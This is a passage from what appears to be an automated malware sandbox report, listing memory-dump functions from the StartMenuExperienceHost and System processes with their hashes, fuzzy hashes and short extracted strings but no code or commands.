              • Opcode ID: 090becbc354f6bda4ee585630bc678dcb9c6830eb80a897873b329ecabe5ef07
              • Instruction ID: d0b3e812ab31591adb28e47968f3d050ea198338d031c78dcde1fff9319a5b41
              • Opcode Fuzzy Hash: 090becbc354f6bda4ee585630bc678dcb9c6830eb80a897873b329ecabe5ef07
              • Instruction Fuzzy Hash: D2F05E70A1860E8EEBC4EF6898592FE76A0FF15301F40053AE81DC2190DF346550C780
              Function 00007FFD347727DD Relevance: .0, Instructions: 31COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 14de5a92620b7cb4f377e759717f76c343de72c2cc0a6a0921cf74ea6a6ffdd2
              • Instruction ID: 4af1c28f7f7542c0405f741d92d97629db8ba6b3375ebde65c0246d98ef41fe4
              • Opcode Fuzzy Hash: 14de5a92620b7cb4f377e759717f76c343de72c2cc0a6a0921cf74ea6a6ffdd2
              • Instruction Fuzzy Hash: ABF0F671A0D689CFEB599F248C652B93FA0FF46300F8144BED519C20D2DB7EA414C340
              Function 00007FFD34772377 Relevance: .0, Instructions: 24COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fd4cc68147644ff0e5eb38d5a1cb17687d365162a51c6ce629e85ea5a38aeb38
              • Instruction ID: f2764ab75f4f0512e8f60d3aa0a898028617ebb41d37341ac34d8f4ca0d6ff7d
              • Opcode Fuzzy Hash: fd4cc68147644ff0e5eb38d5a1cb17687d365162a51c6ce629e85ea5a38aeb38
              • Instruction Fuzzy Hash: 9DF05E70A0865ACFDB10EB10CCA07A877A1FB51310F4042A9C14AD32D2DFB879859B41
              Function 00007FFD3477BCCA Relevance: .0, Instructions: 14COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e4b780b03877db68a31fe5d6e72d2f5ff2c1e79403b71ece43b396150e32fb8d
              • Instruction ID: 125b28653c1e870cc639769c85b7230cb6eb49b3383d0f640ad982722c690d1b
              • Opcode Fuzzy Hash: e4b780b03877db68a31fe5d6e72d2f5ff2c1e79403b71ece43b396150e32fb8d
              • Instruction Fuzzy Hash: 48D01260A4C40BC9DB60D614C894EFC76649F15300F60D5B1811DD2082DD7879C46B80
              Function 00007FFD347858E4 Relevance: .0, Instructions: 12COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34784000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34784000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 94c050ce8753f5a36cf42dcb6b375d2b350f6cbf86076c5186f78ee6eabef547
              • Instruction ID: 63db1404af45819677dc6c58ba0a205a0e8b5aa234beab250121d8183c996946
              • Opcode Fuzzy Hash: 94c050ce8753f5a36cf42dcb6b375d2b350f6cbf86076c5186f78ee6eabef547
              • Instruction Fuzzy Hash: B6D0C9A6A2995E8FEB94DE1848951B97AA2E714284B115121D449D71A1EA2864029740

              Non-executed Functions

              Function 00007FFD3478050C Relevance: 5.0, Strings: 4, Instructions: 36COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34780000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID: H$K$L${
              • API String ID: 0-964284359
              • Opcode ID: d8ecf950a023fd19cefc18c5546fa02bdf1ed46dc339ae028b6d4c7a6fdc16c2
              • Instruction ID: 5bfeeb554f212ba7305527a54a0b5a1e917e3788b9ef13fec444f6b4fc7848a0
              • Opcode Fuzzy Hash: d8ecf950a023fd19cefc18c5546fa02bdf1ed46dc339ae028b6d4c7a6fdc16c2
              • Instruction Fuzzy Hash: B30100B4E0922ACADF688F10C9A43FD7671AF56300F4040B9C31DA6281CB7C6A81DF80

              Executed Functions

              Function 00007FFD34793565 Relevance: .3, Instructions: 302COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3edfca292d32b60718bdf96eecf9e4d098c31ab6e18f5739913a35c34ce24e1b
              • Instruction ID: 626f3e0f02d6e4ba2f82f53f47e3ad478d5f5c8563746d7631a49aaa943dbcfc
              • Opcode Fuzzy Hash: 3edfca292d32b60718bdf96eecf9e4d098c31ab6e18f5739913a35c34ce24e1b
              • Instruction Fuzzy Hash: 6CA17071B1894E8EEB94EB68C8697AD7BE1FF9A310F50017AD10DD32D6CFB968018741
              Function 00007FFD3479DD31 Relevance: 2.8, Strings: 2, Instructions: 254COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID: Ng4$p\g4
              • API String ID: 0-3099952731
              • Opcode ID: 0f9e105a8a1f2252ea51f4ed38af970746227167f178e9e440cfaf6ddbb2f552
              • Instruction ID: 2b17b2bc1d55dfaf0d32cf5b0b0e05213a81c84fdce789d37550982e2f58cfc7
              • Opcode Fuzzy Hash: 0f9e105a8a1f2252ea51f4ed38af970746227167f178e9e440cfaf6ddbb2f552
              • Instruction Fuzzy Hash: 169196B1A19A4ACEE7A89F6484B53F8B7E1FF56314F0441BED10DD21D2CE386844DB81
              Function 00007FFD34790CF8 Relevance: 1.5, Strings: 1, Instructions: 262COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID: H
              • API String ID: 0-2852464175
              • Opcode ID: 717b59debda5d1945cbf29e3c0b859540103289434940691396b4b9955fb1c1a
              • Instruction ID: 5d36bfacd4fe1b23b28ae77b99b7ced01a9cd518dd783f36dc8c6a5addaed69b
              • Opcode Fuzzy Hash: 717b59debda5d1945cbf29e3c0b859540103289434940691396b4b9955fb1c1a
              • Instruction Fuzzy Hash: 8291E871F1994A8BEB94EB288865BECB3B1FF56310F0042B9D00DE7192DE3879459B80
              Function 00007FFD3479C562 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID: Q_H
              • API String ID: 0-1722020806
              • Opcode ID: edaa240c9db56afbde41697220ee6d8c53717bfbd0de2de613a339908640f3d0
              • Instruction ID: c25fa1d38dd96b0ed94a3753560548ad88f394df9acdaf03e633fbf12cff7968
              • Opcode Fuzzy Hash: edaa240c9db56afbde41697220ee6d8c53717bfbd0de2de613a339908640f3d0
              • Instruction Fuzzy Hash: B731BAB1E1891D9FEF94EB5898A56ACB7B1FFAA300F501139D10DE3281DE2868419B40
              Function 00007FFD347A15B2 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID: /
              • API String ID: 0-2043925204
              • Opcode ID: 8d6e31e9084223b2832a542c4b27dbafa55c0b012ae7053945b1217cd0b31d0a
              • Instruction ID: b358870763217536348b4220e4b2a57db65aab82ea27771fdb8a7d94f67af24d
              • Opcode Fuzzy Hash: 8d6e31e9084223b2832a542c4b27dbafa55c0b012ae7053945b1217cd0b31d0a
              • Instruction Fuzzy Hash: 0D31F575E09629CEEBA4DF58C8A47E9B7B1FB55311F1001AAD40DE3281DF386984DF80
              Function 00007FFD34790A01 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID: 8vh4
              • API String ID: 0-3359051434
              • Opcode ID: f5a7290f5664e7fc5bbf1aa2c41d2cfab96eab77c8a54f3b1bff79b51fc3c7ca
              • Instruction ID: 3333c3a20a838e1c34a0940e2ab445f04b2e677c3c146b0484b578e5b216b9da
              • Opcode Fuzzy Hash: f5a7290f5664e7fc5bbf1aa2c41d2cfab96eab77c8a54f3b1bff79b51fc3c7ca
              • Instruction Fuzzy Hash: 6E119171E2854E8FE790EF68C8992BE77E1FF1A310F4145B6C508D61A2EE38B540D780
              Function 00007FFD3479124D Relevance: 1.3, Strings: 1, Instructions: 57COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID: pyh4
              • API String ID: 0-2647341381
              • Opcode ID: f95d571810451aa7e5491a3421520000e88662309b4a1d6bf5609c117171e9d8
              • Instruction ID: dc650328dd4a99d55834710986662a36cf1595151db8f14b8c458e0661874ea6
              • Opcode Fuzzy Hash: f95d571810451aa7e5491a3421520000e88662309b4a1d6bf5609c117171e9d8
              • Instruction Fuzzy Hash: 0111C171B0968A8EFB99AF64C4A82BD7BE0FF5A300F0404BED50AD61D2DE38A550D740
              Function 00007FFD34791260 Relevance: 1.3, Strings: 1, Instructions: 39COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID: pyh4
              • API String ID: 0-2647341381
              • Opcode ID: 2b6dfb072f37488d02ecbf039f1dfe432b5dcfed56b4edb2e14891301bce178f
              • Instruction ID: 46d2eeb830f0a3a65a73515e04597f1addc06d235922b95efe076020510948d1
              • Opcode Fuzzy Hash: 2b6dfb072f37488d02ecbf039f1dfe432b5dcfed56b4edb2e14891301bce178f
              • Instruction Fuzzy Hash: D2F0A471F1954E8AFF98ABA485A82F977E4FF56304F04007AE519D10C2DE286514D680
              Function 00007FFD347A03E4 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID: P
              • API String ID: 0-3110715001
              • Opcode ID: aa5f2709edc1ff099110456efe0fc1d0cf198aed2c6df415270028bfc51d32f0
              • Instruction ID: 3569f8e4dee86757350b8ce822bc1b838cc94ddc2914e9f6f33caa3cb677043e
              • Opcode Fuzzy Hash: aa5f2709edc1ff099110456efe0fc1d0cf198aed2c6df415270028bfc51d32f0
              • Instruction Fuzzy Hash: 45F045B0D1962DCEEBA5DF1488A47E8B6F5AF19301F0050E9D54DE2281CB386B94DF80
              Function 00007FFD347A3708 Relevance: .5, Instructions: 502COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 57822f4be75d66bef79830b1f49e7994c06ae8e9c835f564c96b426e55a207a4
              • Instruction ID: 11731ee492bb95766d140023cbb8755f33fcec117229abd03b4f2bb04e648ac1
              • Opcode Fuzzy Hash: 57822f4be75d66bef79830b1f49e7994c06ae8e9c835f564c96b426e55a207a4
              • Instruction Fuzzy Hash: 9751DEA2E0F6C69FE751AB6848B61E97BE4BF13314F0900F7D598CB193E91C74099381
              Function 00007FFD3479CAA9 Relevance: .4, Instructions: 410COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 08cb049dbf9ebdf10042f307a8157529c33ce602018122e80414522e52a2bbca
              • Instruction ID: 2e93d8f59ea1c22064390f97fbcbfec8d634aeb96355e97d5aed1d94ef256910
              • Opcode Fuzzy Hash: 08cb049dbf9ebdf10042f307a8157529c33ce602018122e80414522e52a2bbca
              • Instruction Fuzzy Hash: 45C1B267B0D6939FE71177B8A4B60FD7B60EF43279B0841B7C288CA093D919744A83D5
              Function 00007FFD347916C8 Relevance: .3, Instructions: 284COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 10c550925e895b7b54b72724d769e8f45d8e916000d97935d318d1f74e7e08fe
              • Instruction ID: 8e298af41b894b31546342cb930d954c4866487b84085c9842d31012ce374ed0
              • Opcode Fuzzy Hash: 10c550925e895b7b54b72724d769e8f45d8e916000d97935d318d1f74e7e08fe
              • Instruction Fuzzy Hash: EB91C271B0CA4A8FEB59DE1C88A55B977E2FF99304B14057AE54DD3282CE38BC12C781
              Function 00007FFD347A6615 Relevance: .2, Instructions: 179COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 726d7a85c244bfb3860e5b46d780165cf5d3975ed390d7f1dcd563d58fa89e01
              • Instruction ID: 89fc538e09e527ce0a5f24ee1c197d9ec08f1c3613de3f2dfe0da32dc6b269ce
              • Opcode Fuzzy Hash: 726d7a85c244bfb3860e5b46d780165cf5d3975ed390d7f1dcd563d58fa89e01
              • Instruction Fuzzy Hash: AB615CB0E0951ACBEBA8DB58C8A57AD77B1FF16300F0041BAD14DE2292DF3C6985DB41
              Function 00007FFD34791D0B Relevance: .2, Instructions: 167COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 97a3ab71b8d4c6437a8a426e355b77efb6fc1733609009485d499e05a036e0e5
              • Instruction ID: 9072b870c280f357b7be7ddcef9182d4fb92e93659a46e0f527a4e4d81df1fe8
              • Opcode Fuzzy Hash: 97a3ab71b8d4c6437a8a426e355b77efb6fc1733609009485d499e05a036e0e5
              • Instruction Fuzzy Hash: 5251E470B18A4A8FEB5CDE1888A55BA73E2FF99304B14457ED54EC3281CE34B812C7C1
              Function 00007FFD34793155 Relevance: .2, Instructions: 166COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1dd6761f5719e8e0d20d22164c15bbb4a7097ca11d7f5c5587d09446130b9442
              • Instruction ID: 0075e597b02af69cbfdbd81a63dd0f986759e68f50b72edb6c64a0a326af8cfc
              • Opcode Fuzzy Hash: 1dd6761f5719e8e0d20d22164c15bbb4a7097ca11d7f5c5587d09446130b9442
              • Instruction Fuzzy Hash: 255129B1E18519CFEB94EBA8C4A46EDB7F1FF5A311F500039D109E7292DB38A944DB80
              Function 00007FFD3479CB4D Relevance: .2, Instructions: 164COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 47f04281693fd97b9cefa9cca0125e42ff7bab296f00afede99284b732fb801f
              • Instruction ID: c5c41a09b3227a3707a89ccd0e36bfcba2519a4dd6a0d8ec16a19cc8898083a2
              • Opcode Fuzzy Hash: 47f04281693fd97b9cefa9cca0125e42ff7bab296f00afede99284b732fb801f
              • Instruction Fuzzy Hash: 3941B063B089278BEB14BBACB0660FE7B54EF43339B144537D24CDA083DA2D309596D5
              Function 00007FFD347A3124 Relevance: .2, Instructions: 151COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 85a25390ceb8b91b9937a1743ec80e08d96434139de3dfb6af17873dcc3415f7
              • Instruction ID: 4b37a1cee7b6ebd36c0e26c4b50f0d0cbb93e370a77957211f13df4b0ce5da3a
              • Opcode Fuzzy Hash: 85a25390ceb8b91b9937a1743ec80e08d96434139de3dfb6af17873dcc3415f7
              • Instruction Fuzzy Hash: BD51F7B0E0861DDEEB94EF68D8957ACB6B2FF59300F50416AD50DE3291CF386981DB40
              Function 00007FFD3479CB78 Relevance: .1, Instructions: 145COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7864034bf35c7cee8e11140c7d2b2378a76de6f95bd7e42f2509d12ac1ac6ef6
              • Instruction ID: a5667d1eae4565bd2129fc02e7a17f9974958d86f74c18522eff327b6e01e4cc
              • Opcode Fuzzy Hash: 7864034bf35c7cee8e11140c7d2b2378a76de6f95bd7e42f2509d12ac1ac6ef6
              • Instruction Fuzzy Hash: 7641C0A3B089278BEB14BBACB0A60FD7B54EF43339B144537D20CCA093DA2D709596D4
              Function 00007FFD3479CB80 Relevance: .1, Instructions: 141COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 43fa06fba33d42d61830b9f62749060260b4322edc770b5e33e69c402003b620
              • Instruction ID: b1de1b83048ea7061069ad10c16c6c115dda6ce89ee2bb83cd8df4ab9b846a0a
              • Opcode Fuzzy Hash: 43fa06fba33d42d61830b9f62749060260b4322edc770b5e33e69c402003b620
              • Instruction Fuzzy Hash: 954190A3B089178BEB54BBACB4A60FD7B54EF43339B144537D20CDA093DA2C709596D4
              Function 00007FFD347A2E43 Relevance: .1, Instructions: 139COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e8c437937fca1b2904fb0f6882e1caaaf45010727d9a36f02aa78a96d4b49e9f
              • Instruction ID: 9866c7962e1ac92eff4cbdc2073876bdae67e5ce5c8d70c49b29777cbcedc286
              • Opcode Fuzzy Hash: e8c437937fca1b2904fb0f6882e1caaaf45010727d9a36f02aa78a96d4b49e9f
              • Instruction Fuzzy Hash: 6D51D870E0851D9FEB94EF58D895BACB6B2FB59300F5041AAD40DE3291DF386985DB40
              Function 00007FFD34792115 Relevance: .1, Instructions: 138COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 38c4978b698a7b9120f37d8b388e0442de49ef3abe6f060553322288df1ef600
              • Instruction ID: 9ef9cae59a27f5d8204af649e5dc812868728f67b2bd3e87ba6d1b2310555651
              • Opcode Fuzzy Hash: 38c4978b698a7b9120f37d8b388e0442de49ef3abe6f060553322288df1ef600
              • Instruction Fuzzy Hash: 8C413671B0DA4A8FE795EB7894A51B977E1EF87300F0549BBD50DC72A2DE2CB8418381
              Function 00007FFD3479CC12 Relevance: .1, Instructions: 133COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 55a1bca25edfa0e5d45baeda2576969fd22c0f77fcc696c25f9c427c1d5b695c
              • Instruction ID: 1bd3a929e0fecc75a8f18c449254f6b4473e78464311eb4bc93a23904667d99d
              • Opcode Fuzzy Hash: 55a1bca25edfa0e5d45baeda2576969fd22c0f77fcc696c25f9c427c1d5b695c
              • Instruction Fuzzy Hash: 1441AFA7B085179BEB54BAACB4A60FD7B54EF43379B040537D60CCA093DE2C348992D4
              Function 00007FFD34791DA3 Relevance: .1, Instructions: 118COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a9929934709bb1a7b455dc6780ddf9ad101c985a925a1c61815ef1dbc21a691b
              • Instruction ID: 10098bcdb8c23f32b2118788cc0114741fd3f8bbd287b8adba7b80565fd66168
              • Opcode Fuzzy Hash: a9929934709bb1a7b455dc6780ddf9ad101c985a925a1c61815ef1dbc21a691b
              • Instruction Fuzzy Hash: DB316070B18A4A8FDB4CDE1CC8A557A73E2FBD9345B14463EE54AD3285CE34E8128B81
              Function 00007FFD3479CBD3 Relevance: .1, Instructions: 118COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0443ed01f5c2b741679eafd2fed15d09e798745d7bd622d03696768b349409c9
              • Instruction ID: a4ebeee58a87b176c4f39e3f2d603d477b26adb57766052955707446a8ab74e3
              • Opcode Fuzzy Hash: 0443ed01f5c2b741679eafd2fed15d09e798745d7bd622d03696768b349409c9
              • Instruction Fuzzy Hash: 8331A1A7B089178BEB55BAACB4A60FD7B50EF83339F044537D208C6093DE2C345592D4
              Function 00007FFD347A7469 Relevance: .1, Instructions: 113COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6a9ddac6ea9af0ae972447df0bf58f97422c3fc1b7bbd25ad530f9a960731488
              • Instruction ID: 3e376b58e3e594798ee31bc1106192b6131daf2597c4ad89e23eaec842a8f03f
              • Opcode Fuzzy Hash: 6a9ddac6ea9af0ae972447df0bf58f97422c3fc1b7bbd25ad530f9a960731488
              • Instruction Fuzzy Hash: 9941DDB0A0D64ACFEBA4DF54C4A52FD7BE1EF1A310F04017AD509E2292CA3CB8449BC1
              Function 00007FFD3479C5DA Relevance: .1, Instructions: 96COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b1713b35a72a26fdc9dd8b694d343e5fe0ac7fecac48adc6154a64401e746cd0
              • Instruction ID: 082edb592343e9fdd6899a60f1165915bfa6fe0c598e24b5cf39059f1dac1a99
              • Opcode Fuzzy Hash: b1713b35a72a26fdc9dd8b694d343e5fe0ac7fecac48adc6154a64401e746cd0
              • Instruction Fuzzy Hash: E221CEB1E1C91DCFEF94EB5898A96ACB7B1FF5A300F50113AD10DE7282DE2868419B40
              Function 00007FFD347A2E14 Relevance: .1, Instructions: 94COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 77a36cba4a41dfa5e4c367c12fbeb281b207e9cf91f96054b663bcbe5c32e1bc
              • Instruction ID: 224f5cfb14ee5fba3da838f37dd111c31bed659e480cbaeaa43641ff565aeceb
              • Opcode Fuzzy Hash: 77a36cba4a41dfa5e4c367c12fbeb281b207e9cf91f96054b663bcbe5c32e1bc
              • Instruction Fuzzy Hash: 3441CC70E1891E8EDB64EB98C8A5BEDB7B1FF59300F1045B5D10DE3292DE7869819F80
              Function 00007FFD347A7345 Relevance: .1, Instructions: 88COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 41217ac9ad0dbebb240b9f25f12d413cceb752c67e2bfd3b7bc4f4974aefbe1e
              • Instruction ID: 651ff413a818be49582ccb36b78e9f5688f95862d41147130b818856cb992e7a
              • Opcode Fuzzy Hash: 41217ac9ad0dbebb240b9f25f12d413cceb752c67e2bfd3b7bc4f4974aefbe1e
              • Instruction Fuzzy Hash: 2221A271A0EA8ACBEBA5DB6484B62FD37A0FF16304F05047AD90DC2692DE39B454D781
              Function 00007FFD3479B2E4 Relevance: .1, Instructions: 83COMMON
              Download Yara Rule
